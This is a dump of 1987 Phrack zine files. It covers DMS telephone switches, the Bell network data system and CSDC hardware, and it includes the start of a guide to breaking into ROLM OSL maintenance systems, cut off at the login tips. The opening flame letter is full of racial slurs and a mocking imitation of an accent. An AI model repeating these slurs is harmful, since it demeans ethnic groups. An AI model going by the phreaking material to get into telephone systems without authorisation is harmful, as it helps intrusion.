as you claim for several reasons. Just by the nature of your attitude, the
way you think you are powerful because you can "tell" people about their lives
and families when you yourself are a Chinese bastard who has an unemployed
father that can barely speak the English language.
"Miko ith no heeahh riiitte nao"
(Michael is no here right now)
You have ragged on Arthur Dent when you know that you will NEVER receive the
admiration or stature whether it be socially or economically he has attained.
You have ragged on Dr. Doom when he has achieved more than you can ever hope
for. You only commenced to rag on him when he turned down your offer to join
PhoneLine Phantoms. This is because he refused to be associated with an
asshole like you. You continually show signs of immaturity (I am not saying I
am perfect) by poking fun at other people's races (blacks, spics, Iranians)
when you yourself are nothing but a rice dick.
You bad mouth people but, when you need their help you beg for it and ask them
to be cool. You write stupid poems and rhymes about people when they are a
TOTAL misrepresentation of facts. You claim Dr. Doom is so ugly he could
never leave his room. Tell me, have you ever met Dr. Doom? Isn't it true
that you ragged on him only because he didn't want anything to do with you,
your group, and your image?
Are you going to rag on me now and prove all the points I have brought out? I
think so. You ragged on me, telling me my family receives government cheese
handouts and telling me what a loser I am when you yourself have never met me
or bothered to seek the real facts. You then proceeded to badger me to join
your new "legion of queers," The Network Technicians telling me how cool it
would be and begging me to help you learn. But don't I receive government
cheese handouts? Aren't I such a loser? Mr. Solid State trusted you and
joined PLP. He thought nothing bad of you at the time. He just considered
all the rumors about you to be false or misrepresentation. When PLP dissolved,
he saw no purpose to be in any longer and dropped out. You proceeded to rag
on him, when you know you aren't half the man he is. You don't even possess
half the knowledge or personality he has. Tell me, what gives you such
authority to rag on people? What makes you so supreme? Why are you so rich,
when you are 18 and don't even have a car, when you go on and on about your
parents?
You rag on Atlantis because you were kicked off. Now you tell people how lame
it is and how stupid The Lineman and Sir William are. When you know that they
were sick of your, "I am supreme attitude," of your childish antics and your
lack of knowledge of any kind.
Well, Exy, rag on me now, tell me how lame I am, insult me. Make your poems,
songs, and raps. Tell me what kind of a loser I am. Insult Solid State, show
us just how childish you can be. Until then, go back into your dream world
and leave us alone.
Oryan QUEST

422
phrack12/4.txt Normal file
View file

@ -0,0 +1,422 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #4 of 11
<%><%><%><%><%><P><h><a><n><t><a><s><i><e><%><%><%><%><%>
<S> A Tribunal Communications Ltd. (c) 1987 <S>
<h> <p>
<a>Understanding the Digital Multiplexing System (DMS)<a>
<d> Part 1 <w>
<o> By Control C <n>
<w><%><%><%><%><%><R><e><a><l><m><%><%><%><%><%><%><%><!>
The DMS switching system, is a lot smaller than normal systems. It takes up
less than 16% of the space for the same number of Step-By-Step (SXS) lines and
20% of cross bar. This is done by taking the hardware out of the CO and
putting them closer to a group of subscribers. Then central office services
can be provided over shorter loops.
DMS offers remote switching with a bunch of remote modules in a bunch of
sizes and capabilities. Some include SXS replacement or growth, Outside plant
cable relief, and Office feature's. The use of remote modules give the CO
more floor space that would usually be used by the Line Concentrating Modules
(LCMs), Main Distribution Frame (MDF), and cable equipment. The advantage of
these modules is that it extends the service radius of the CO, this means
outside plant savings. Remote modules can be located up to 150 miles away
without messing up transmissions.
Other advantages of the DMS system are that it allows integration between
Transmission facilities and switching systems. It's hardware & software is
designed to give a full range of switching applications for Private Branch
Exchange (PBX) business systems, local, toll, and local/toll requirements. The
same Central Control Complex (CCC) and switching networks are used throughout
the whole system. The only difference between each system is the peripheral
units, and software packages. It has a Maintenance and Administration Position
(MAP) which is a integrated multifunction machine interface that switch
maintenance, line and trunk network management, and service order changes can
be carried out.
The software for the central processor is written in PROTEL, a high level
pascal based language. Peripheral processors use a XMS-Pascal software
language.
DMS has a high line and trunk capacity. It has up to 100,000 lines on a
DMS-100 or 60,000 trunks on a DMS-200. It also gives up to 1.4 million
two-way CCS through the switching network. The processor can accept up to
350,000 call attempts.
Here's a list of the DMS systems in use today:
DMS-100 - is a class 5 local office with the ability to handle 1,000 to
100,000 lines. It can give basic telephone service or expanded to handle IBN
custom calling features. The DMS-100 MTX gives cellular radio services. A
local office can also be adapted to Equal Access End Office (EAEO).
Remote Switching Center (RSC) - Ability to handle up to 5,760 lines.
Remote Line Concentrating Module (RLCM) - Ability to handle up to 640 lines.
It uses host Line Concentrator Module (LCM) that can be used by the RSC or
directly by the host DMS-100.
Outside Plant Module (OPM) - Ability to handle up to 640 lines. This also can
be used by the RSC or directly by the host DMS-100.
Subscriber Carrier Module (SCM-100) - There are three basic types of
SCM-100's:
1- Subscriber Carrier Module Rural (SCM-100R) - This eliminates the central
office Central Control Terminal (CCT) by integrating directly into the
DMS-100 through the DMS-1 span lines.
2- Subscriber Carrier Module SLC-96 (SCM-100S) - This gives a direct
interface between DMS-100 and AT&T's SLC-96 digital loop carrier
systems.
3- Subscriber Carrier Module Urban (SCM-100U) - It's used as an interface
to the DMS-1 Urban. The DMS-1 urban is a digital subscriber carrier
system modified for use in Urban areas. It gives Plan Ordinary
Telephone Service (POTS) and special services between a central office
and residential and business communities. It has the ability to handle
576 lines of POTS and special services.
DMS-200 - Has the ability to handle from a few hundred to 60,000 trunks. This
switch can also serve a Access Tandem (AT) function. The Traffic Operator
Position System (TOPS) puts operator services into the DMS-200. Operator
Centralization (OC) allows a single operator location by using the TOPS
positions to transfer operator services from other DMS-200 toll centers. The
Auxiliary Operator Services System (AOSS) let operator services on calls that
need outside information (Such as Directory assistance).
DMS-100/200 - Allows local and toll features described above but also includes
a Equal Access End Office (EAEO)/Access Tandem (AT) combination. It has the
ability to handle up to 100,000 lines or 60,000 trunks.
DMS-250 - This is a high capacity toll system for specialized common carriers
needing tandem switching operations.
DMS-300 - This is a toll system designed for international use. To my
knowledge there are only two DMS-300 switches in use at this time.
DMS switches are divided into four "Functional" areas designed to do certain
operations. These areas are:
1- Central Control Complex (CCC)
2- Network (NET)
3- Peripheral Modules (PM)
4- Maintenance and Administration (MAP)
Here's a description of those areas.
Central Control Complex
Within the Central Control Complex (CCC), the main program in the switch
controls the processing of calls, maintenance and administrative routines, and
changes the activity for these routines to other areas of the switch. The CCC
sends messages to the network, the maintenance and administrative areas trough
message links and directs the functions to be run in those areas.
Network
The Network Modules (NMs) handle the routing of speech paths between the
Peripheral Modules (PMs) and keep these speech connections for the rest of the
call. The network handles message and speech links between the PMs and the
CCC.
Maintenance and Administration
Within the Maintenance and Administration includes Input/Output Controllers
(IOCs) - IOCs interface local or remote input/output devices. The I/O devices
are used to do testing, maintenance, or administrative functions for the
system.
Peripheral Modules
Peripheral Modules (PMs) are used as interfaces between digital carrier spans
(DS-1), analog trunks, and subscriber lines. The PMs are used for scanning
lines for changes of circuit state, doing timing functions used for call
processing, creating dial tones, sending, receiving signaling, and controlling
information to and from the CCC, and checking the network.
Before 1984 only four types of PMs gave trunk interfaces to the DMS system;
these include Trunk Modules (TMs), Digital Carrier Modules (DCMs), Line
Modules (LMs), and Remote Line Modules (RLMs). Since then ten more have been
added, these include Digital Trunk Controller (DTC), Line Group Controller
(LGC), Line Trunk Controller (LTC), Line Concentrating Module (LCM), Remote
Switching Center (RSC), Remote Line Concentrating Module (RLCM), Outside Plant
Module (OPM), Subscriber Carrier Module Rural (SCM-100R), Subscriber Carrier
Module SLC-96 (SCM-100S), and Subscriber Carrier Module Urban (SCM-100U).
Here's and explanation of those modules:
Trunk Module
The Trunk Module (TM) changes incoming speech into digital format, it has the
ability to handle 30 analog trunks. The Pulse Code Modulation (PCM)
information is combined with the trunks supervisory and control signals then
transmitted at 2.56 Mb/s over speech links to the network.
The TM also uses service circuits such as Multifrequency (MF) receivers,
announcement trunks, and test circuits. Each TM has the ability to interface
30 analog trunks or service circuits to the network over one 32-channel speech
link. The TM is not traffic sensitive so each trunk can carry 36 CCS.
Digital Carrier Module
The Digital Carrier Module (DCM) gives a digital interface between the DMS
switch and the DS-1 digital carrier. The DS-1 signal consists of 24 voice
channels. The DCM takes out and puts in signaling and control information on
the DS-1 bit streams which then makes them DS-30 32-channel speech links. The
DCM can interface five DS-1 lines; 5*24=120 voice channels; into four 32-
channel speech links. The DCM can carry a maximum of 36 CCS of traffic on
each trunk.
Line Module
The Line Module (LM) gives an interface for a maximum of 640 analog lines and
condenses the voice and signaling into two, three, or four DS-30, 32-channel
speech links. Four speech links have the ability to handle 3,700 Average Busy
Season Busy Hour (ABSBH) CCS per LM.
Remote Line Module
The Remote Line Module (RLM) is a LM operating in a remote location from the
DMS host. The RLMs can be located up to 150 miles from the host office,
depending on the transmission facilities.
Digital Trunk Controller
The Digital Trunk Controller (DTC) has the ability to interface 20 DS-1 lines.
Then the DS-1 lines are linked to the network by a maximum of 16 DS-30 speech
links; each trunk is able to handle 36 CCS.
Line Group Controller
The Line Group Controller (LGC) dose medium level processing tasks, with the
ability to use host and remote subscriber line interfaces. The LGC has the
ability to use Line Concentrating Modules (LCMs), Remote Switching Centers
(RSCs), Remote Line Concentrating Modules (RLCMs), and Outside Plant Modules
(OPMs).
The LGC can interface up to 20 DS-30 speech links from the LCMs or up to 20
DS-1 links with the ability to serve RSCs, RLCMs, or OPMs.
Line Trunk Controller
The Line Trunk Controller (LTC) combines the DTC and LGC functions and gives a
way to use all the equipment inside the office. The LTC has the ability to
handle the LCM, RSC, RLCM, OPM, and digital trunk interfaces.
The LTC has the ability to give interfaces to a maximum of 20 outside ports
from DS-30A speech links or DS-1 links to 16 network side DS-30 speech links.
Line Concentrating Module
The Line Concentration Module (LCM) when used with the LGC or LTC is just an
expanded version of the line Module. It can serve up to 640 subscriber lines
interfaced with two to six DS-30A speech links. Using six speech links 5,390
CCS can be handled per LCM.
Remote Switching Center
The Remote Switching Center (RSC) interfaces subscriber lines at a remote
location to a DMS-100 host. It has the ability to handle interface for 5,760
lines and is used a replacements for dial offices or Private Branch Exchanges
(PBXs). It can handle 16,200 CCS with the use of 16 DS-1 links.
The RSC consists of the following:
Line Concentrator Module (LCM) - These modules do line interface function.
They are the same as the LCMs that are used in the DMS-100 host.
Remote Cluster Controller (RCC) - This controller gives DS-1/LCM interface,
Local switching inside the remote, and Local intelligence and signaling when
in ESA.
Remote Trunking - Handles the use of RSC originating or terminating traffic
for digital trunking off the RSC. It can give trunking to a CDO co-located
with the RSC or within the service range of the RSC, Private Automatic Branch
Exchanges (PABXs), or Direct Inward Dialing (DID) trunks.
Remote-off-Remote - Lets the RLCMs and OPMs connect to the RCC through DS-1
interfaces. It lets RLCM and OPM subscribers to use the same lines to the host
as the RSC subscribers.
Emergency Stand-Alone (ESA) - If communication with the DMS-100 is lost this
will allow you to call internal to the RSC. It will give station-to-station
and station-to-trunk calls for POTS, IBN, and electronic business sets.
Remote Line Concentrating Module
The Remote Line Concentrating Module (RLCM) is just a LCM used is a remote
location from the DMS-100 host. The RLCM can handle 640 lines; this can is
sometimes used as a replacement for CDOs or PBXs.
Outside Plant Module
The Outside Plant Module (OPM) is an outside plant remote unit. The OPM can
handle 640 lines over six DS-1 links.
Subscriber Carrier Module
The Subscriber Carrier Module (SCM) gives a direct interface for remote
concentrators.
SCM-100R - It can interface up to five Northern Telecom DMS-1 Rural Remote
Terminals (RTs). A DMS-1 rural remote terminal can interface up to 256 lines.
Communication between the RT and SCM- 100R is done through one or two span
lines for voice and one protection line.
SCM-100U - It can interface up to three DMS-1 Urban RTs. A DMS-1 Urban can
interface up to 576 POTS or special service lines. Communication from the RT
to the SCM-100U us done through a maximum of eight DS-1 links.
SCM-100S - It can interface up to four Mode I (non-concentrated) SLC-96
systems or up to six Mode II (concentrated) systems. A SLC-96 can give
interface for up to 96 lines.
The SCM-100 takes away the need for central concentrating terminals and analog
line circuits at the host.
Operator Features
With the use of DMS-200 or DMS 100/200 switch, operator features are available
by the following:
Traffic Operator Position System (TOPS)
Operator Centralization (OC)
Auxiliary Operator Service System (AOSS)
Traffic Operator Position System (TOPS) gives many operator function on inward
and outward calls. The TOPS integrates the operator system with the DMS-200
or DMS-100/200 toll switch.
One voice and one data circuit are needed for each operator position. The
voice circuit is connected to a port of a three-port conference circuit. The
other two ports are connected to the calling and called parties. The data
circuit is used for a digital modem and is used to transmit data punched in by
the operator to the CCC for processing.
Operator Centralization
Operator Centralization (OC) lets the operator use the services given by the
DMS-200 or DMS-100/200 with TOPS. With OC operator traffic from surrounding
DMS sites can be routed to a central host site.
Operator Centralization Diagram
Routing - - -
<-----\ DMS-200 | AMA |
\ Remote TC / - - -
= = = = = = = /
| \ ----- ___|_/
| \: DMS : |
| : 200 : | Host TC -----
| : : | = = = = = = = = /| POS |
| : (OC:___| | --------- | / |- - -|
| : : |\ | : DMS-200 : | / |Oper.|
| -----\ | \ | : (TOPS) :__|_/ -----
= = = = = = = \____________|__: : |
Trib Ope Traffic->\ ____________|__:OC) : |
\ / | : : |
Non-DMS Remote TC / | --------- |
= = = = = = = = = = = = = = = = = = =
| -------- ----- |
| : TDM : : (OC: |
| : Switch : : : | -----
| : : : DMS :_|_____: AMA :
| : : : 200 : | -----
| /-------- -----\ |
= = = = = = = = = = =
/Routing \ <-Trib Opr Traffic
\-------> \
Auxiliary Operator Services System
The Auxiliary Operator Services System (AOSS) is made to handle directory
assistance, intercept, and that type of operator services, automatic call
distribution, call processing, call detail recording, and operator
administration functions for other operator services that do not need call
completion to a called party. AOSS position uses the same hardware as the
TOPS links to the switch.
Equal Access
Equal Access (EA) is accessible through DMS switches with the addition of
software packages. Both Equal Access End Office (EAEO) for the DMS-100 and
Access Tandem (AT) for the DMS-200 provide equal access features.
Equal Access Network Application
--------- __________________________________
(Phone)--------| DMS-100 |___________ |
--------- | |
NON-EAEO | |IC/INC
-------- -------- /---------\ TO
(Phone)---| |------------| DMS-200 |------------ ---- IC/INC
-------- --------- \---------/ /----->
| |
--------- ___________| |
(Phone)--------| DMS-100 |__________________________________|
---------
DMS-100 EAEO
The DMS-100 EAEO gives direct access to interLATA (Local Access and Transport
Area) carriers Point of Presence (POP) inside the LATA. The DMS-200 AT gives
a traffic concentration and distribution function for interLATA traffic
originating or terminating inside a LATA. It allows the following:
10XXX and 950-1XXX dialing
presubscription dialing
equal access and normal network control signaling
Automatic Number Identification (ANI) on all calls
custom calling services
Common Channel Interoffice Signaling
Common Channel Interoffice Signaling (CCIS) uses a separate data link to
transmit signaling messages between offices for many trunks and trunk groups.
There are two types of CCIS available in the DMS-200 or DMS-100/200, Banded
Signaling (CCIS-BS) and Direct Signaling (CCIS-DS).
CCIS-BS is for interoffice trunk signaling to give information on digits
dialed, trunk identity, and other class and routing information. This kind of
trunk signaling takes less time to setup calls and put's an end to Blue
Boxing.
CCIS-DS is used to transfer call handling information past what is required
for trunk setup. This type of signaling lets calling card validation,
mechanized calling card services and billed number screening to be used.
Cellular Mobile Radio Service
Cellular Mobile Radio Service is possible with the DMS-100 Mobile Telephone
Exchange (MTX). The MTX has the ability to serve from a few hundred to over
50,000 people in up to 50 cells.
Thanks to Northern Telecom and my local CO.
Control C
ToK!
March 1987
End of Part 1
<%><%><%><%><%>

252
phrack12/5.txt Normal file
View file

@ -0,0 +1,252 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #5 of 11
THE TOTAL NETWORK DATA SYSTEM
BY DOOM PROPHET
The Total Network Data System is a monitoring/analysis network used by
several offices within the Telco to analyze various levels of switching
systems in relation to maintenance, performance, and future network planning
purposes. The systems and the offices that use them will be described in
detail in the following text.
All switching entities that are in one particular serving area collect
traffic information that is classified in three ways: peg count, overflow, and
usage. Peg count is a count of all calls offered on a trunk group or other
network component during the measurement interval, which is usually one hour.
It includes calls that are blocked, which is classified as overflow traffic.
The other measurement types that the TNDS network analyzes and collects are as
follows:
Maintenance Usage (for 1ESS, 2ESS, 5XB, 1XB, XBT)
Incoming Usage (for 1E, 2E, 4AETS)
All trunks busy (SxS)
Last Trunks Busy (SxS)
Completions (SxS, 5XB, XBT, 1XB)
Incoming Peg Count (DMS)
Maintenance Busy Count (2E, 3E)
Detector Group Usage (SxS, 5XB, XBT, 1XB)
In ESS and DMS offices, traffic data is collected by the central processor of
the switch. In electomechanical offices such as crossbar, a Traffic Usage
Recorder is used to scan trunks and other components about every 100 seconds,
counting how many are in use. This data when compiled is sent to the EADAS
system, which is located in the Operating Company's Network Data Collection
Centers and runs on a minicomputer. 4ESS and 4Xbar toll offices do not use
EADAS, but their own system called the Peripheral Bus Computer for traffic
data analysis. After receiving the traffic data from up to 80 switching
offices, EADAS performs two basic functions: It processes some data in near
real time (shortly after it is received) to provide hourly and half hourly
reports and a short term database for network administrators. It also collects
and summarizes data that it will pass on to the other TNDS systems via data
links or magnetic tape.
Three other systems receive directly from EADAS. These systems are ICAN,
TDAS, and EADAS/NM. ICAN stands for Individual Circuit Analysis plan and is
used to study individual circuits in central office equipment that have been
specified by network administrators.
TDAS is the Traffic Data Administration System, which formats traffic data
for use by the remaining downstream systems. ICAN and EADAS/NM are the only
two systems with data links to EADAS that don't have their data formatted by
TDAS before reception. TDAS is run on a mainframe in the NDCC and can be
thought of as a distribution facility for the traffic data. EADAS/NM is used
to watch switching systems and trunk groups designated by network managers,
and reports existing or anticipated congestion on a display board at the
Network Management Centers, where the system is located. Problems can be
analyzed with this system and dealt with within a short period of time after
they occur.
Central Office Reporting Systems
--------------------------------
There are five TNDS engineering and administrative systems that provide
operating company personnel with reports about CO switching equipment. These
are the LBS, 5XBCOER, SPCSCOER, ICAN, and SONDS. LBS, the Load Balance System,
helps assure that the customer traffic load is uniformly distributed over each
switching system. It minimizes congestion on the concentrators, which allow
subscribers to share the equipment in the switch. The LBS analyzes traffic
data coming to it from TDAS to determine the traffic load on each line group
that the system serves. LBS generates reports used by the NMC to determine
line groups that can have new incoming subscriber lines assigned to them. LBS
also does a load balance indexes for the entire operating company, indicating
how effectively each CO has avoided congestion.
Crossbar #5 Central Office Equipment Reports (5XBCOER) and Stored Program
Control Systems COER used for 1, 2, and 3 ESS offices, analyze traffic data to
indicate the overall service provided by the switching system and to tell how
much of its capacity is being used. This info helps determine if new equipment
is needed.
ICAN, which was described briefly above, detects switching system
equipment faults by identifying abnormal load patterns on individual circuits.
A series of reports printed at the Network Administration Center helps network
administrators analyze individual circuit usage and verify circuit grouping.
ICAN is located at the BOC main computer center along with 5XBCOER.
The fifth CO equipment reporting system is called the Small Office Network
Data System, or SONDS. SONDS performs a full range of data manipulation
functions, and is used to provide economically the full TNDS features for step
by step offices. Step offices send data directly to this system, and it is not
formatted by EADAS or TDAS, as it doesn't go through these systems. Weekly,
monthly, exception and on demand reports are automatically distributed by
SONDS to the NAC personnel.
Trunk Network Reporting Systems
-------------------------------
These systems are parts of the TNDS used by the Circuit Administration
Center to support trunk servicing and forecasting. The Trunk Servicing System
helps trunk administrators develop short term plans to make the best use of
the trunks that are already in use. It receives and processes data received
from TDAS and computes offered load. Offered load is the amount of traffic a
trunk group would have carried had the number of circuits been large enough to
handle the load without trunk blocking (giving the caller a re-order or all
circuits busy recording). TSS produces weekly reports showing underutilization
of trunks and below grade of service trunk groups which do not have enough
trunks in them. The CAC uses these reports to add or disconnect trunks
according to what traffic requirements exist.
The Traffic Routing and Forecasting System, replacing the Trunk
Forecasting System, forecasts message trunk requirements for the next five
years. Major conversions and similar network changes are all taken into
consideration when determining the future traffic needs. TRFS receives data
from EADAS, TDAS, and TSS and is located at the Operating Company computer
center.
Since TDAS and some of the downstream TNDS systems need much of the same
information, that information is maintained in a system called Common Update.
In this manner, some data does not have to be duplicated in each individual
system. Some of the information includes the configuration of switching
equipment and the trunk network and specifications on traffic registers for
central offices. Numbers recorded by each register are treated consistently by
each system that uses the Common Update data base. There is an update base for
trunking, referred to as CU/TK, and an update on equipment known as CU/EQ. The
trunking part of the Operating Company's data base is coordinated by the Trunk
Records Management System.
Since the TNDS systems are so important to the proper operation of the
network, the CSAR (Centralized System For Analysis and Reporting) is used to
monitor the entire TNDS performance. The NDCC, the NAC, and the CAC are
provided with measurements of the accuracy, timeliness, and completeness of
the data flow through TNDS from beginning to end. It doesn't analyze data from
EADAS/NM, SONDS, or TRFS.
BOC Operations Centers
----------------------
NAC-Network Administration Center. Responsible for optimum loading, and
utilization of installed COE. Performs daily surveillance of COs and trunk
groups to ensure service objectives are being met. The NAC Reviews profiles of
office load relating to anticipated growth. They work with NSEC to initiate
work orders to increase equipment in use. The systems they use are EADAS,
SPCSCOER, CSAR, and SONDS.
NMC-Network Management Centers. The NMC keeps the network operating
efficiently when unusual traffic patterns or equipment failures would
otherwise result in congestion. The NMC analyzes network performance and
prepares contingency plans for peak days, telethons, and major switch
failures. They monitor a near real time network performance data to identify
abnormal situations. The system they use is EADAS/NM.
CAC-Circuit Administration Center. The CAC ensures that in service trunks
meet current as well as anticipated customer demands at acceptable levels of
service. For planned servicing, the CAC compares current traffic loads with
forecasted loads for the upcoming busy season. If the loads are consistent,
the CAC issues the orders to provide the forecasted trunks. When
inconsistencies occur, they examine the variation, develop modified forecasts,
and issue orders based on the new forecast. They review weekly traffic data to
identify trunk groups that need additions and issue the necessary trunk
orders. The systems they use are TSS, TRFS, and CSAR.
NSEC-Network Switching Engineering Center. They plan and design the
network along with the CAC. NSEC develops a forecast of loads for traffic
sensitive switching equipment, sets office capacities, and determines relief
size and timing.
For long range planning, the following offices are utilized.
TNPC-Traffic Network Planning Center. The TNPC determines the most
economic growth and replacement strategies. They handle future network
considerations over a 20 year period for tandem systems, operator services
networks, interconnecting trunks, and switching terminations to accommodate
the trunks.
WCPC-Wire Center Planning Center. This office does the same as the TNPC,
but their jurisdiction includes local switches, the subscriber network, and
interoffice facilities. They have the numbers, types, and locations of
switches and homing arrangements. They also keep track of alternate routes,
tandem centers, etc. Both the TNPC and WCPC provide the CAC and NSEC with
office and network evolution plans for 20 years.
District based maintenance and administration operations are handled by
the NAC, RCMAC, and the SCC. These can cover 240 square miles of serving area.
Network Operations Centers
--------------------------
The highest level of network operations is the Network Operations Center,
located in the AT&T Long Lines HQ in Bedminster, NJ. The main computers used
by the NOC are in Netcong, about 25 miles away, along with some backups. The
NOC are responsible for interregional coordination between the 12 RNOCs, 27
NMCs, and 2 RNMCs in Canada; for monitoring the top portion of toll switches
(all class 1 Regional Centers, 2 Canadian, about 70 class 2 Sectional Centers,
200 Primary centers, some class 4 Toll centers); for monitoring of the
international gateways, and the CCIS network for these switching systems. The
STP signalling links connect STPs to each other, to switches, and to a
centralized database called an NCP (Network Control Point) of which access is
given to switches directly via CCIS.
The Data Transfer Point, which is a data switch that furnishes the NOC with a
flow of monitoring information for all key toll switches, also gives them
information about CCIS STPs and the IOCCs that they monitor.
The operating system supporting the NOC is the NOCS (the S being System),
which is configured with the DTP, a wall display processor, graphics
processors, receive only printers, and CRT terminals for the technicians. The
NOC also uses EADAS/NM through the DTP. Both the NOCS and the DTP run Unix
operating systems.
The second highest level of these operations centers are the RNOCs, or
Regional Network Operations Centers. The 12 RNOCs monitor the CCIS network and
coordinate the 2-3 NMC's activities for its region. The RNOCs use the EADAS/NM
system and something called NORGEN, Network Operations Report Generator, that
prints out reports from EADAS's traffic data.
The first or lowest level of these centers is the Network Management
Centers. There were 27 EADAS/NM supported NMCs across the United States as of
1983. The NMC was described above, as well as the systems it used.
==============================================================================
Some of this information was taken from Bell System publications and from
trashed materials, and may not be the same for every area. All material is
correct to the best of the author's knowledge. Thanks to The Marauder for
supplying some information. This file was written for educational purposes
only.
-End Of File-

157
phrack12/6.txt Normal file
View file

@ -0,0 +1,157 @@
Written March, 1987
==Phrack Inc.==
Volume Two, Issue 12, Phile #6 of 11
/\ /\
<[]>==========================================<[]>
\/ ^ ^ \/
|| PLP [+]The Executioner[+] PLP ||
++ ^ ^ ++
|| [+] PhoneLine Phantoms! [+] ||
++ ++
|| CSDC - Hardware Requirements ||
++ ----------------------------- ++
|| PLP | PHRACK XII - PHRACK XII | PLP ||
/\ ----------------------------- /\
<[]>==========================================<[]>
\/ Phreak Klass Room 2600 = 806-799-0016 \/
|| _______________ Login: Educate ||
++ |The only BBS | Sysop:Egyptian Lover ++
|| |that teaches.| Cosysop:The Executioner||
/\ --------------- Board lose:Oryan Quest /\
<[]>==========================================<[]>
\/ \/
Preface:
========
This is the second part of my CSDC (Circuit Switched Digital Capability)
series, the first being in PHRACK X. It is suggested that you read the first
part and also the file on PACT in PHRACK XI. If I feel the material was not
covered completely, I will make a third addition to this file.
Hardware Interfaces
===================
A NCTE or equivalent network interface equipment, located on the customer
premises, is required to provide the CSDC feature for a customer. The NCTE or
an equivalent circuit, located on the customer's premises, is required to
provide TCM (Time-Compression-Multiplexing) transmission on the 2-wire
subscriber loop. The NCTE also has a remote loopback for testing from CSDC
central office.
Dedicated 2-way CSDC trunk circuits are provided via DCT (Digital Carrier
Trunk) combined alternate data/voice (CADV) units with DCT supervision. MF and
CCIS signalling is allowed on these trunks. They provide signalling, switching
and trunking functions between 1A ESS switch and other CSDC offices. To
provide CSDC, the DCT bank must be equipped with alarm and digroup control
units. A Digital Office Timing Supply (DOTS) is needed to provide network
synchronization for the CSDC feature. A minimum of 3 CSDC maintenance circuits
are needed for the CSDC feature to operate. The circuit provides digital
signals for testing CSDC trunks and loops. They also provide a test
termination for incoming CSDC calls. If an office has superimposed ringing for
4 and 8 party lines, these ringing circuits may be used for loop testing with
the maintenance circuit.
Remote Switching System
=======================
The RSS remote frame contains eight special service slot positions that can be
used for D4 type plug in units (basically allows the RSS to have CSDC
abilities). This allows the CSDC TRXS (Time Compression Multiplexing Remote
Subscriber Exchange) channel units to be housed in the RSS frame. The CSDC
feature is provided via the RSS T1 carrier facilities. The T1 carriers for
CSDC service terminate with position 1 and 0 at the RSS. A ringing and tone
plant is required in the RSS office to ring the phones of special service
channel unit subscribers.
Operation of the CSDC
=====================
An off-hook origination initiates the seizure of an originating register.
A line translation is performed and the CSDC indicator is received from the
Line Equipment Number Class (LENCL) and is stored in the register. A touch
tone service receiver is connected to the line and dial tone is applied. Upon
receiving a digit, dial tone is removed. If the first digit is a '#', digit
collection is set up to collect 2 more digits. Upon receipt of the 2 digits
(99), the PACT (Prefix Access Code Translator) is indexed via the dialed
digits to determine what service has been requested. If the line cannot have
CSDC, an error message is sent. The AB digits (carrier selection) are
collected next. Once the AB digits have been determined to be valid, the CCOL
(Chart Column) is received. The CCOL merely is a code to tell the PACT what is
to be done. Once the AB digits and the CSDC CCOL is received, the original
register is overwritten with the CSDC CCOL. The CSDC office then sends a bit
down the line to tell the equipment that a CSDC call is being processed.
The call is now reinitialized to appear as though no digits have been
collected. Digit collection proceeds until the proper number of digits (7 to
10) has been received. An AMA register is seized at the end of the dialing.
The call is then routed according to the dialed digits on a CSDC outgoing
trunk. Answer guard timing for CSDC calls is 800 ms. Upon answer, the answer
time is recorded in the AMA register.
An outpulsing trunk is seized and a POB is hunted. If an outgoing trunk
and outpulsing device are needed, one will be hunted. Information on the trunk
is stored and a transfer to the outpulsing routine (MF or CCIS) is done. A
verification insures that both calling and called parties are CSDC allowed. If
they are not, the call is routed to an Automatic Intercept Service (AIS).
For MF outpulsing, a junior register is seized, the outgoing trunk is put
into the proper states, and start pulsing signal detection is done followed by
digit outpulsing. For CCIS, call processing is the same as a normal call but a
CCIS continuity check is performed while on the on-hook state.
For an incoming call, the CSDC bit from the Trunk Class Code (TCC) is
stored in the incoming register and a CSDC count is pegged. Digit collection
is performed and a terminating DN translation is performed. Ringing is applied
normally and once it has been answered, the incoming trunk is put in the
off-hook state to pass answer to the next office.
Standard disconnect and trunk guard timing is performed on CSDC calls
when the called or calling party goes off-hook after a talking path has been
established.
Standard CSDC Dynamics
======================
Call forwarding codes dialed after the CSDC code result in reorder.
The Call waiting option is also suspended when a CSDC call is in progress.
Busy tone is given to POTS call that terminates to a CSDC connection. Busy
tone is also given to a calling CSDC party if it encounters a busy line.
In order to have a 800 CSDC feature, the office must have CCIS INWATS ability
in the OSO (Originating Screening Office).
Dialing 911 after the CSDC code is allowed, but 411/611 calls are routed to
error messages.
NCTE (Network Channel Terminating Equipment)
============================================
As covered in Part 1, the NCTE is the equipment that you need to have CSDC.
The NCTE is a piece of hardware that is connected to the CO loop and a
terminal. On the terminal, there are 8 jacks for 8 pins on the NCTE. The
functions of each pin are as followed.
1 - TRANSMISSION DATA
2 - TRANSMISSION DATA
3 - MODE CONTROL
4 - MODE CONTROL
5 - TIP VOICE
6 - RING VOICE
7 - RECEIVED DATA
8 - RECEIVED DATA
==============================================================================
This ends PART II of the CSDC series. Since Taran King was in such a hurry, I
will finish the 3rd file with SCCS integrations, loop structure and RSS
structures.
If you have any questions about this file or any other file, please leave me a
message on either...
Phreak KlassRoom 2600 = 806-799-0016 LOGIN:EDUCATE
My Voice Mail Box = 214-733-5283

209
phrack12/7.txt Normal file
View file

@ -0,0 +1,209 @@
==Phrack Inc.==
Volume Two, Issue 12, Phile #7 of 11
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
\ /
/ Hacking : OSL Systems \
\ /
/ Written by Evil Jay \
\ /
/ (C) 1987/88 Evil Jay \
\ /
-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-/\-
Prologue:
This file is for all those people who are running across the OSL system
and are constantly confused about getting in and what to do once you're in.
Because of the trouble I had getting a manual on the system from ROLM, I
was forced to write this file from what I already know, and what I can do
on the few systems I have gained access to. Since this file is far from
complete (without a manual, most are), I'll leave it to you, to write up
future files on the OSL system. Credit goes to Taran King who got me
interested in writing the file, and who tried to help me get a manual (my
social engineering leaves something to be desired).
What is OSL:
Actually it has been termed as Operating Systems Location, Off Site
Location and a lot of other names. Which? I'm not sure. What I can tell
you is that it's an operating system running on an IBM (?) that does
remote maintenance operations on a ROLM PBX (Referred to as CBX I
believe). As I said, this file is not too complete, and I was unable to
get very much information about the system, or the PBX system itself. I
believe Celtic Phrost wrote a file on ROLM PBX systems, and you might want
to read that or other ROLM files for more information.
Getting In:
If you have trouble logging in, try changing your parity. Also, this
system will only except uppercase. The first thing you should see when you
get a carrier is the following:
